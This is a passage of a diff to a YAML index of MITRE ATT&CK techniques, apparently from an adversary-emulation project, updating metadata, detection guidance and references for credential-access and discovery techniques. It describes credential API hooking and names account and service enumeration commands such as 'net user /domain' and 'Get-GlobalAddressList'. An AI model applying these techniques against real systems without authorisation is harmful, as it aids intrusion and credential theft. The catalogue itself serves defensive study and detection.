-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48625,28 +49279,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48703,9 +49423,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48736,7 +49455,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48760,8 +49479,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48826,12 +49543,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48890,7 +49606,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48911,7 +49626,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48932,13 +49647,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48961,15 +49674,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48995,13 +49707,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49026,12 +49737,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -49073,13 +49783,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49140,12 +49849,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49209,19 +49917,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -49268,7 +49975,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -49335,12 +50041,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -49430,18 +50135,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -49484,12 +50188,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49530,12 +50233,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49620,7 +50322,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49682,12 +50383,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49738,12 +50438,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49754,7 +50453,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49769,7 +50467,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49817,7 +50514,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49889,12 +50587,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49936,122 +50633,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
